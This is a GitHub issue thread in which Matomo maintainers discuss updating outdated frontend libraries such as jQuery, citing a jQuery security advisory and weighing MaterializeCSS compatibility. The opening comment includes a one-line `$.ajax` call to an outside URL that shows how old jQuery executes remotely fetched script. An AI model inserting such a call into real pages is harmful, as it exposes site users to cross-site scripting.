Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

update frontend libraries like jquery #12961

Closed
Findus23 opened this issue May 23, 2018 · 10 comments
Closed

update frontend libraries like jquery #12961

Findus23 opened this issue May 23, 2018 · 10 comments
Assignees
Labels
c: Security For issues that make Matomo more secure. Please report issues through HackerOne and not in Github. Task Indicates an issue is neither a feature nor a bug and it's purely a "technical" change.
Milestone

Comments

@Findus23
Copy link
Member

Findus23 commented May 23, 2018

I know this is a tedious task with no direct benefit, but the possibility of breaking some things.

But most JS libraries haven't been updated since Piwik 3 in 2016. And since then many things changed, new browsers appeared and security issues were found.

One of the largest that (kind of) affects Matomo is https://nodesecurity.io/advisories/328 which affects all jQuery versions <3.0.0
Simply said running

$.ajax('http://sakurity.com/jqueryxss')

in Matomo executes the JavaScript at http://sakurity.com/jqueryxss.
Thankfully @sgiehl had the great foresight 6 years ago when creating the ajaxhelper (in 9979315) to fallback to "json" as a format, so I think Matomo isn't affected.

But I still think that updating JS regularly will avoid possible future issues.

(The same can be said for composer dependencies, but thanks to the new npm audit command, checking for security issues in frontend libraries was easier)
Update: It seems like https://packagist.org/packages/roave/security-advisories is something similar for php dependencies

@Findus23 Findus23 added Task Indicates an issue is neither a feature nor a bug and it's purely a "technical" change. c: Security For issues that make Matomo more secure. Please report issues through HackerOne and not in Github. labels May 23, 2018
@tsteur
Copy link
Member

tsteur commented May 23, 2018

Just FYI: MaterializeCSS is not compatible with jQuery 3+ in case it was planned to update to a newer jquery major version.

@Findus23
Copy link
Member Author

Findus23 commented May 23, 2018

@tsteur It seems like the fix has already been merged a year ago and will be released soon:
Dogfalo/materialize#3201

But I wouldn't be surprised if a lot of other things stop working.

@tsteur
Copy link
Member

tsteur commented May 23, 2018

@Findus23 that will be in MaterializeCSS 1.0 but we are likely not compatible with that version and may need to update a bit of code and plugins to make that work (to be tested). Just saying we may not be easily able to upgrade to that version and only as part of Matomo 4.0 as it may hard for plugins to keep them compatible with 0.X version and 1.X version of MaterializeCSS etc. But maybe it is not really an issue, it is just a matter of testing and see how much we need to change and what. Most of the logic is centralized so it might not be too bad.

@mattab mattab added this to the 3.8.0 milestone Sep 10, 2018
@Findus23
Copy link
Member Author

BTW: MaterializeCSS 1.0 just came out.

@mmakos-profidata
Copy link

mmakos-profidata commented Sep 16, 2019

Is there a chance that this issue will be resolved in the next version (3.12.0)?

@diosmosis
Copy link
Member

It's probably not something I will finish for 3.12, but someone else could finish the work I started.

@tsteur
Copy link
Member

tsteur commented Sep 16, 2019

I'm not sure what exactly we're planning to upgrade? jQuery we likely can't update since Materialize is not compatible, and we very likely don't want to update Materialise to 1.0 as there are a lot of breaking changes AFAIK and plugins become incompatible and we would not be able to have plugins compatible with new and older versions of Matomo and be a lot of work to update them all if /where needed. This would be rather something for Matomo 4.

@Findus23
Copy link
Member Author

Findus23 commented Sep 16, 2019 via email

@tsteur
Copy link
Member

tsteur commented Sep 16, 2019

But after that it might be worth it to stay up to date more regularly as applying minor updates is easier than falling too far behind.

Totally, only problem is really when they have major updates with breaking changes. In general the goal should be to update minor and patch releases of libs during a release.

@tsteur tsteur modified the milestones: 3.12.0, 4.0.0 Sep 16, 2019
@diosmosis diosmosis reopened this Jun 7, 2020
@diosmosis
Copy link
Member

Finally closed in #16079, only library that needs to be dealt w/ is jqplot but that is too hard to do atm.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
c: Security For issues that make Matomo more secure. Please report issues through HackerOne and not in Github. Task Indicates an issue is neither a feature nor a bug and it's purely a "technical" change.
Projects
None yet
Development

No branches or pull requests

5 participants